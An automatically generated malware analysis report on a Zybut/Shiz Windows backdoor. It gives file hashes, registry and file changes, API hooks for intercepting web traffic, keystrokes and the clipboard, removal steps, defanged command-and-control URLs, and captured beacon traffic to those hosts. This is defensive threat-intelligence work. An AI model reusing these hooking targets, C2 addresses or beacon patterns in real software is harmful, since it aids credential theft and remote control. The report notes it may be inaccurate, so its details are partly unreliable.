Skip to main content

Gen.Heur.Zybut.1_2786cbabcd


HEUR:Backdoor.Win32.Generic (Kaspersky), Gen:Heur.Zybut.1 (B) (Emsisoft), Gen:Heur.Zybut.1 (AdAware), Backdoor.Win32.Shiz.FD, Shiz.YR, GenericInjector.YR, BackdoorCaphaw_QKKBAL.YR (Lavasoft MAS)Behaviour: Backdoor

The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Summary

MD5: 2786cbabcd57f37bc167ceb8a7c6de6c

SHA1: 8ab8c1f4da624c6863c18e4d0eaaa31155084cf8

SHA256: 9b885c3d036a2f94b2352322383e6799aecb038d539f48054b91cc393168f725

SSDeep: 6144:BgiD9CmFlaRUdduv9sZIUlfxryHfvau9hHoyrnETB2ebz:T9C3N2ZIUl4/njr8B2Yz

Size: 263680 bytes

File type: EXE

Platform: WIN32

Entropy: Packed

PEID: BorlandDelphi30, UPolyXv05_v6

Company: no certificate found

Created at: 2008-01-10 22:31:36

Analyzed on: WindowsXP SP3 32-bit

Summary: Backdoor. Malware that enables a remote control of victim's machine.

Dynamic Analysis

Payload

No specific payload has been found.

Process activity

The Backdoor creates the following process(es):

%original file name%.exe:1616

The Backdoor injects its code into the following process(es):

Explorer.EXE:1572

Mutexes

The following mutexes were created/opened:No objects were found.

File activity

The process %original file name%.exe:1616 makes changes in the file system.


The Backdoor creates and/or writes to the following file(s):

%System%\config\software (3251 bytes)
%System%\config\SOFTWARE.LOG (5347 bytes)
%WinDir%\AppPatch\jsvlax.exe (1951 bytes)

The Backdoor deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\1.tmp (0 bytes)

Registry activity

The process %original file name%.exe:1616 makes changes in the system registry.


The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F2 57 EC 37 72 FE 84 78 F8 19 E4 84 17 62 F0 2E"

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\%WinDir%\apppatch\jsvlax.exe_, \??\%WinDir%\apppatch\jsvlax.exe"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"a8a67a25" = "pEìX£bÀ¸¬qÄHF‡KöHêe?²ºoD¬òd¼Œ¤Kô1,Š$ë›ÛÌ«”¹l}Ë {œzŒôC%é[qñl4ì;û´[Ò#»Û:ÑU„„ԝ\±ª²Dƒuœ¡Ü¼);¼\ƒtµ2”kDù”a”*›cü$}Sô|ë$¤ô{¬q³#sÅå\yuJÛËu©|ù¢rKã!$’‹‹b±ÃÄ£ãÍ‚“ÉUcdÁÄZ¡r»ô”)Û©Š]“QlYÛl]$$D´ƒÌ£Q$aŒ‚*™ü›ÙóÍÁ=éÔÑщ¬q9|áíù’‘íÁ©šÄR"

Dropped PE files

MD5 File path
91f2d8066a31de887e48e30545ce8816c:\WINDOWS\AppPatch\jsvlax.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

The Backdoor installs the following user-mode hooks in CRYPT32.dll:

CertVerifyCertificateChainPolicy

The Backdoor installs the following user-mode hooks in WININET.dll:

HttpSendRequestExA
HttpSendRequestW
InternetReadFileExA
InternetWriteFileExA
InternetQueryDataAvailable
HttpSendRequestExW
InternetReadFile
HttpSendRequestA
InternetCloseHandle

The Backdoor installs the following user-mode hooks in USER32.dll:

GetWindowTextA
GetClipboardData
SendInput
GetMessageA
GetMessageW
TranslateMessage

The Backdoor installs the following user-mode hooks in ADVAPI32.dll:

CryptEncrypt

The Backdoor installs the following user-mode hooks in WS2_32.dll:

WSASend
recv
gethostbyname
WSARecv
send

The Backdoor installs the following user-mode hooks in kernel32.dll:

CreateFileW

Propagation

Removals

Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.

Manual removal*

  1. Scan a system with an anti-rootkit tool.
  2. Terminate malicious process(es) (How to End a Process With the Task Manager):

    %original file name%.exe:1616

  3. Delete the original Backdoor file.
  4. Delete or disinfect the following files created/modified by the Backdoor:

    %System%\config\software (3251 bytes)
    %System%\config\SOFTWARE.LOG (5347 bytes)
    %WinDir%\AppPatch\jsvlax.exe (1951 bytes)

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

Static Analysis

VersionInfo

Company Name: flouncey
Product Name: Canorousness
Product Version: 1.7.4.9
Legal Copyright: Knitter
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 3.8.7.1
File Description: africanthropus
Comments:
Language: English (United States)

Company Name: flounceyProduct Name: CanorousnessProduct Version: 1.7.4.9Legal Copyright: KnitterLegal Trademarks: Original Filename: Internal Name: File Version: 3.8.7.1File Description: africanthropusComments: Language: English (United States)

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
UPX14096338135844.119955ca8758b50bde507e627becdf44a6897
.text819218397184324.10307d3d0964c061dc60f7916c3972277c4a6
.b286726717120484.039770e8429d2ddee1efcf0d0af1ab7fab5ed
.rdata983042745715362.8866968e2621575b0ea1d4e93cd3680b56226
.edata126976114375762885.530330a8c26a3a29305690056c6cd49665ea4
.data24166428501466565.157935567b42cb2577da1dff07341a38ec095
.edata5283841925351464325.531861434184dc08b2c631cb66d45420529d0
.tXJuJ72499263325246080b1e27aa018409de6bfd73f8afb883a65
.rsrc1359872257230723.70019f55779d590a38be7408c663b2921f237

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:


Total found: 2
f331d7b25b956ea87d59ad294c0a9060
4790b969fbec046133f300fe459f8f0d

Network Activity

URLs

URL IP
hxxp://cihunemyror.eu/login.php192.42.116.41
hxxp://fodakyhijyv.eu/login.php195.22.28.197
hxxp://lysovidacyx.eu/login.php185.28.193.192
hxxp://digivehusyd.eu/login.php69.195.129.70
hxxp://sso.anbtr.com/domain/vofozymufok.eu195.22.28.222
hxxp://sso.anbtr.com/domain/nopegymozow.eu195.22.28.222
hxxp://keraborigin.eu/login.php54.201.30.58
hxxp://sso.anbtr.com/domain/fodakyhijyv.eu195.22.28.222
hxxp://sso.anbtr.com/domain/marytymenok.eu195.22.28.222
hxxp://fodakyhijyv.eu/519227042aaa4d45b3d8d04c6d6182c2195.22.28.197
hxxp://fodakyhijyv.eu/90623dde15463e9fb45001ad5063db65195.22.28.197
hxxp://sso.anbtr.com/domain/gatedyhavyd.eu195.22.28.222
hxxp://sso.anbtr.com/domain/jewuqyjywyv.eu195.22.28.222
hxxp://fodakyhijyv.eu/4abc123f5bc1fe014bbeb686d9306960195.22.28.197
hxxp://fodakyhijyv.eu/56531f80c1f00a0d974859702a1ece40195.22.28.197
hxxp://ww62.galokusemus.eu/54.72.9.51
hxxp://sso.anbtr.com/domain/qeqinuqypoq.eu195.22.28.222
hxxp://ze1.zeroredirect1.com/zcvisitor/56383af2-8f66-11e5-9f3b-06d3db30a52554.86.84.196
hxxp://sso.anbtr.com/domain/kemocujufys.eu195.22.28.222
hxxp://fodakyhijyv.eu/daf1516824a145639bf41787e2765d81195.22.28.197
hxxp://sso.anbtr.com/domain/rynazuqihoj.eu195.22.28.222
hxxp://ww92.dimutobihom.eu/208.91.197.245
hxxp://sso.anbtr.com/domain/ciliqikytec.eu195.22.28.222
hxxp://fodakyhijyv.eu/bd3d82839c544969cd7e5b6b151fa69e195.22.28.197
hxxp://sso.anbtr.com/domain/tucyguqaciq.eu195.22.28.222
hxxp://sso.anbtr.com/domain/lyvejujolec.eu195.22.28.222
hxxp://fodakyhijyv.eu/1acef55da687a834a563e6c7f72341c6195.22.28.197
hxxp://fodakyhijyv.eu/f2c2596452aa9379694886959d3b2888195.22.28.197
hxxp://fodakyhijyv.eu/f89965e1c0417ff83998ff3762e77e38195.22.28.197
hxxp://fodakyhijyv.eu/d1e2832667be3ac8af2587e3c0958424195.22.28.197
hxxp://fodakyhijyv.eu/be7c0ab0ac1acf15c755867799d818c8195.22.28.197
hxxp://xuxusujenes.eu/login.php208.100.26.234
hxxp://fodakyhijyv.eu/71c55851e5901a95263b027885fa0411195.22.28.197
hxxp://qekenilacap.eu/login.php
hxxp://sso.anbtr.com/domain/nojejecebuw.eu195.22.28.222
hxxp://fodakyhijyv.eu/367a5a5db4f631d0cc1ad3c79b85b63a195.22.28.197
hxxp://xsso.fodakyhijyv.eu/56531f80c1f00a0d974859702a1ece40195.22.28.198
hxxp://ww62.pupujeguper.eu/54.72.9.51
hxxp://ww62.digusebyvad.eu/54.72.9.51
hxxp://ganycyhywek.eu/login.php185.28.193.192
hxxp://xuqufyduras.eu/login.php185.28.193.192
hxxp://nopegymozow.eu/login.php195.22.28.196
hxxp://xsso.nopegymozow.eu/90623dde15463e9fb45001ad5063db65195.22.28.197
hxxp://xsso.ciliqikytec.eu/f89965e1c0417ff83998ff3762e77e38195.22.28.197
hxxp://qeqinuqypoq.eu/login.php195.22.28.199
hxxp://xsso.gatedyhavyd.eu/daf1516824a145639bf41787e2765d81195.22.28.196
hxxp://ww92.masawocipel.eu/208.91.197.245
hxxp://ww92.qetuluvolos.eu/208.91.197.245
hxxp://xsso.qeqinuqypoq.eu/bd3d82839c544969cd7e5b6b151fa69e195.22.28.199
hxxp://marytymenok.eu/login.php195.22.28.199
hxxp://lykemujebeq.eu/login.php185.28.193.192
hxxp://vofozymufok.eu/login.php195.22.28.196
hxxp://ww62.xuqufyduras.eu/54.72.9.51
hxxp://xsso.marytymenok.eu/4abc123f5bc1fe014bbeb686d9306960195.22.28.199
hxxp://ryhuzilywax.eu/login.php185.28.193.192
hxxp://dimutobihom.eu/login.php185.28.193.192
hxxp://ww92.qexofyqihid.eu/208.91.197.245
hxxp://ww92.ryleryqacic.eu/208.91.197.245
hxxp://tufecagemyl.eu/login.php185.28.193.192
hxxp://qebahilojam.eu/login.php185.28.193.192
hxxp://xsso.vofozymufok.eu/519227042aaa4d45b3d8d04c6d6182c2195.22.28.198
hxxp://novomyfexij.eu/login.php185.28.193.192
hxxp://jeluganusog.eu/login.php185.28.193.192
hxxp://mamixikusah.eu/login.php185.28.193.192
hxxp://ww92.qekikyvutic.eu/208.91.197.245
hxxp://ww62.puregivytoh.eu/54.72.9.51
hxxp://rynazuqihoj.eu/login.php195.22.28.197
hxxp://ww62.lykemujebeq.eu/54.72.9.51
hxxp://norumikemem.eu/login.php185.28.193.192
hxxp://ww62.norumikemem.eu/54.72.9.51
hxxp://xsso.jewuqyjywyv.eu/71c55851e5901a95263b027885fa0411195.22.28.197
hxxp://ww62.nozulufynax.eu/54.72.9.51
hxxp://vocakemenir.eu/login.php185.28.193.192
hxxp://qexofyqihid.eu/login.php185.28.193.192
hxxp://xsso.lyvejujolec.eu/be7c0ab0ac1acf15c755867799d818c8195.22.28.197
hxxp://nojejecebuw.eu/login.php195.22.28.198
hxxp://kemocujufys.eu/login.php195.22.28.197
hxxp://ww92.jeluganusog.eu/208.91.197.245
hxxp://ww62.vocakemenir.eu/54.72.9.51
hxxp://pupujeguper.eu/login.php185.28.193.192
hxxp://ciliqikytec.eu/login.php195.22.28.198
hxxp://digusebyvad.eu/login.php185.28.193.192
hxxp://qetuluvolos.eu/login.php185.28.193.192
hxxp://masawocipel.eu/login.php185.28.193.192
hxxp://lyvejujolec.eu/login.php195.22.28.198
hxxp://ww92.mamixikusah.eu/208.91.197.245
hxxp://ww62.ganycyhywek.eu/54.72.9.51
hxxp://ww92.kevedorozup.eu/208.91.197.245
hxxp://xsso.kemocujufys.eu/1acef55da687a834a563e6c7f72341c6195.22.28.198
hxxp://jewuqyjywyv.eu/login.php195.22.28.197
hxxp://qekikyvutic.eu/login.php185.28.193.192
hxxp://tucyguqaciq.eu/login.php195.22.28.196
hxxp://galokusemus.eu/login.php185.28.193.192
hxxp://xsso.nojejecebuw.eu/367a5a5db4f631d0cc1ad3c79b85b63a195.22.28.199
hxxp://kevedorozup.eu/login.php185.28.193.192
hxxp://ww92.novomyfexij.eu/208.91.197.245
hxxp://nozulufynax.eu/login.php185.28.193.192
hxxp://ww92.rynyhipexon.eu/208.91.197.245
hxxp://lyvufixyvet.eu/login.php185.28.193.192
hxxp://xugiqonenuz.eu/login.php69.195.129.70
hxxp://puregivytoh.eu/login.php185.28.193.192
hxxp://rynyhipexon.eu/login.php185.28.193.192
hxxp://ww92.tufecagemyl.eu/208.91.197.245
hxxp://xsso.tucyguqaciq.eu/d1e2832667be3ac8af2587e3c0958424195.22.28.196
hxxp://ww62.lyvufixyvet.eu/54.72.9.51
hxxp://ryleryqacic.eu/login.php185.28.193.192
hxxp://xsso.rynazuqihoj.eu/f2c2596452aa9379694886959d3b2888195.22.28.199
hxxp://ww62.qebahilojam.eu/54.72.9.51
hxxp://gatedyhavyd.eu/login.php195.22.28.196
puvybivihox.eu185.28.193.192
ww92.xuqufyduras.eu208.91.197.245
ww92.ryhuzilywax.eu208.91.197.245
ww62.ryhuzilywax.eu54.72.9.51
www.bing.com204.79.197.200
ww62.qetuluvolos.eu

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

GET /domain/fodakyhijyv.eu HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: sso.anbtr.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 302 Moved Temporarily

Server: nginx

Date: Fri, 20 Nov 2015 09:09:00 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Set-Cookie: anbtr=56531f80c1f00a0d974859702a1ece40; domain=.fodakyhijyv.eu

Location: hXXp://xsso.fodakyhijyv.eu/56531f80c1f00a0d974859702a1ece40

3e..Go hXXp://xsso.fodakyhijyv.eu/56531f80c1f00a0d974859702a1ece40..0..

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: marytymenok.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'

HTTP/1.1 302 Moved Temporarily

Server: nginx

Date: Fri, 20 Nov 2015 09:08:59 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Location: hXXp://sso.anbtr.com/domain/marytymenok.eu

Set-Cookie: btst=50f0100787987c2c428a9f0fa37a4606|194.242.96.218|1448010539|1448010539|0|1|0

Set-Cookie: snkz=194.242.96.218

0..

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: tufecagemyl.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'

HTTP/1.1 302 Found

Server: nginx

Date: Fri, 20 Nov 2015 08:21:35 GMT

Content-Type: text/html

Content-Length: 0

Connection: keep-alive

X-Powered-By: PHP/5.3.10-1ubuntu3.11

Location: hXXp://ww92.tufecagemyl.eu

Vary: Accept-Encoding

HTTP/1.1 302 Found..Server: nginx..Date: Fri, 20 Nov 2015 08:21:35 GMT..Content-Type: text/html..Content-Length: 0..Connection: keep-alive..X-Powered-By: PHP/5.3.10-1ubuntu3.11..Location: hXXp://ww92.tufecagemyl.eu..Vary: Accept-Encoding..

GET /domain/nojejecebuw.eu HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: sso.anbtr.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 302 Moved Temporarily

Server: nginx

Date: Fri, 20 Nov 2015 09:09:20 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Set-Cookie: anbtr=367a5a5db4f631d0cc1ad3c79b85b63a; domain=.nojejecebuw.eu

Location: hXXp://xsso.nojejecebuw.eu/367a5a5db4f631d0cc1ad3c79b85b63a

3e..Go hXXp://xsso.nojejecebuw.eu/367a5a5db4f631d0cc1ad3c79b85b63a..0..

GET /domain/qeqinuqypoq.eu HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: sso.anbtr.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 302 Moved Temporarily

Server: nginx

Date: Fri, 20 Nov 2015 09:09:00 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Set-Cookie: anbtr=bd3d82839c544969cd7e5b6b151fa69e; domain=.qeqinuqypoq.eu

Location: hXXp://xsso.qeqinuqypoq.eu/bd3d82839c544969cd7e5b6b151fa69e

3e..Go hXXp://xsso.qeqinuqypoq.eu/bd3d82839c544969cd7e5b6b151fa69e..0..

GET /be7c0ab0ac1acf15c755867799d818c8 HTTP/1.1

Host: xsso.lyvejujolec.eu

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Cookie: btst=921732dff967db654c4cf7d27e59db6c|194.242.96.218|1448010539|1448010539|0|1|0; snkz=194.242.96.218

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: nginx

Date: Fri, 20 Nov 2015 09:09:00 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Set-Cookie: anbtr=be7c0ab0ac1acf15c755867799d818c8; domain=.lyvejujolec.eu

19..Landed lyvejujolec.eu<br>..0..

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: tucyguqaciq.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'

HTTP/1.1 302 Moved Temporarily

Server: nginx

Date: Fri, 20 Nov 2015 09:08:59 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Location: hXXp://sso.anbtr.com/domain/tucyguqaciq.eu

Set-Cookie: btst=e3ae6590680be4ef924aaa5811bb8a71|194.242.96.218|1448010539|1448010539|0|1|0

Set-Cookie: snkz=194.242.96.218

0..

GET /daf1516824a145639bf41787e2765d81 HTTP/1.1

Host: xsso.gatedyhavyd.eu

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Cookie: btst=5cdf1e54d8e3563b09609288cb6405b8|194.242.96.218|1448010539|1448010539|0|1|0; snkz=194.242.96.218

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: nginx

Date: Fri, 20 Nov 2015 09:09:00 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Set-Cookie: anbtr=daf1516824a145639bf41787e2765d81; domain=.gatedyhavyd.eu

19..Landed gatedyhavyd.eu<br>..0..

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: qekenilacap.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'

HTTP/1.1 404 Not Found

Date: Fri, 20 Nov 2015 09:09:08 GMT

Server: Apache/2.2.22 (Debian)

Vary: Accept-Encoding

Content-Length: 287

Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL /login.php was not found on this server.</p>.<hr>.<address>Apache/2.2.22 (Debian) Server at qekenilacap.eu Port 80</address>.</body></html>.....

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: qekenilacap.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'

HTTP/1.1 404 Not Found

Date: Fri, 20 Nov 2015 09:09:08 GMT

Server: Apache/2.2.22 (Debian)

Vary: Accept-Encoding

Content-Length: 287

Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL /login.php was not found on this server.</p>.<hr>.<address>Apache/2.2.22 (Debian) Server at qekenilacap.eu Port 80</address>.</body></html>.HTTP/1.1 404 Not Found..Date: Fri, 20 Nov 2015 09:09:08 GMT..Server: Apache/2.2.22 (Debian)..Vary: Accept-Encoding..Content-Length: 287..Content-Type: text/html; charset=iso-8859-1..<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL /login.php was not found on this server.</p>.<hr>.<address>Apache/2.2.22 (Debian) Server at qekenilacap.eu Port 80</address>.</body></html>...

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: vocakemenir.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'

HTTP/1.1 302 Found

Server: nginx

Date: Fri, 20 Nov 2015 08:21:40 GMT

Content-Type: text/html

Content-Length: 0

Connection: keep-alive

X-Powered-By: PHP/5.3.10-1ubuntu3.11

Location: hXXp://ww62.vocakemenir.eu

Vary: Accept-Encoding

HTTP/1.1 302 Found..Server: nginx..Date: Fri, 20 Nov 2015 08:21:40 GMT..Content-Type: text/html..Content-Length: 0..Connection: keep-alive..X-Powered-By: PHP/5.3.10-1ubuntu3.11..Location: hXXp://ww62.vocakemenir.eu..Vary: Accept-Encoding..

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: rynazuqihoj.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'

HTTP/1.1 302 Moved Temporarily

Server: nginx

Date: Fri, 20 Nov 2015 09:08:59 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Location: hXXp://sso.anbtr.com/domain/rynazuqihoj.eu

Set-Cookie: btst=db559cd2ebfad778907f69945582240c|194.242.96.218|1448010539|1448010539|0|1|0

Set-Cookie: snkz=194.242.96.218

0..

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: mamixikusah.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'

HTTP/1.1 302 Found

Server: nginx

Date: Fri, 20 Nov 2015 08:21:35 GMT

Content-Type: text/html

Content-Length: 0

Connection: keep-alive

X-Powered-By: PHP/5.3.10-1ubuntu3.11

Location: hXXp://ww92.mamixikusah.eu

Vary: Accept-Encoding

HTTP/1.1 302 Found..Server: nginx..Date: Fri, 20 Nov 2015 08:21:35 GMT..Content-Type: text/html..Content-Length: 0..Connection: keep-alive..X-Powered-By: PHP/5.3.10-1ubuntu3.11..Location: hXXp://ww92.mamixikusah.eu..Vary: Accept-Encoding..

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: xuxusujenes.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'

HTTP/1.1 404 Not Found

Server: nginx/1.4.6 (Ubuntu)

Date: Fri, 20 Nov 2015 09:10:30 GMT

Content-Type: text/html

Content-Length: 579

Connection: keep-alive

<html>..<head><title>404 Not Found</title></head>..<body bgcolor="white">..<center><h1>404 Not Found</h1></center>..<hr><center>nginx/1.4.6 (Ubuntu)</center>..</body>..</html>..<!-- a padding to disable MSIE and Chrome friendly error page -->..<!-- a padding to disable MSIE and Chrome friendly error page -->..<!-- a padding to disable MSIE and Chrome friendly error page -->..<!-- a padding to disable MSIE and Chrome friendly error page -->..<!-- a padding to disable MSIE and Chrome friendly error page -->..<!-- a padding to disable MSIE and Chrome friendly error page -->......

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: xuxusujenes.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'

HTTP/1.1 404 Not Found

Server: nginx/1.4.6 (Ubuntu)

Date: Fri, 20 Nov 2015 09:10:30 GMT

Content-Type: text/html

Content-Length: 579

Connection: keep-alive

<html>..<head><title>404 Not Found</title></head>..<body bgcolor="white">..<center><h1>404 Not Found</h1></center>..<hr><center>nginx/1.4.6 (Ubuntu)</center>..</body>..</html>..<!-- a padding to disable MSIE and Chrome friendly error page -->..<!-- a padding to disable MSIE and Chrome friendly error page -->..<!-- a padding to disable MSIE and Chrome friendly error page -->..<!-- a padding to disable MSIE and Chrome friendly error page -->..<!-- a padding to disable MSIE and Chrome friendly error page -->..<!-- a padding to disable MSIE and Chrome friendly error page -->..HTTP/1.1 404 Not Found..Server: nginx/1.4.6 (Ubuntu)..Date: Fri, 20 Nov 2015 09:10:30 GMT..Content-Type: text/html..Content-Length: 579..Connection: keep-alive..<html>..<head><title>404 Not Found</title></head>..<body bgcolor="white">..<center><h1>404 Not Found</h1></center>..<hr><center>nginx/1.4.6 (Ubuntu)</center>..</body>..</html>..<!-- a padding to disable MSIE and Chrome friendly error page -->..<!-- a padding to disable MSIE and Chrome friendly error page -->..<!-- a padding to disable MSIE and Chrome friendly error page -->..<!-- a padding to disable MSIE and Chrome friendly error page -->..<!-- a padding to disable MSIE and Chrome friendly error page -->..<!-- a padding to disable MSIE and

<<< skipped >>>

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: fodakyhijyv.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'

HTTP/1.1 302 Moved Temporarily

Server: nginx

Date: Fri, 20 Nov 2015 09:08:59 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Location: hXXp://sso.anbtr.com/domain/fodakyhijyv.eu

Set-Cookie: btst=f8b55f9acdb8cb9696d32f18dbcea0d8|194.242.96.218|1448010539|1448010539|0|1|0

Set-Cookie: snkz=194.242.96.218

0..

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: ryleryqacic.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'

HTTP/1.1 302 Found

Server: nginx

Date: Fri, 20 Nov 2015 08:21:34 GMT

Content-Type: text/html

Content-Length: 0

Connection: keep-alive

X-Powered-By: PHP/5.3.10-1ubuntu3.11

Location: hXXp://ww92.ryleryqacic.eu

Vary: Accept-Encoding

HTTP/1.1 302 Found..Server: nginx..Date: Fri, 20 Nov 2015 08:21:34 GMT..Content-Type: text/html..Content-Length: 0..Connection: keep-alive..X-Powered-By: PHP/5.3.10-1ubuntu3.11..Location: hXXp://ww92.ryleryqacic.eu..Vary: Accept-Encoding..

GET /367a5a5db4f631d0cc1ad3c79b85b63a HTTP/1.1

Host: xsso.nojejecebuw.eu

Referer: hXXp://VVV.google.com

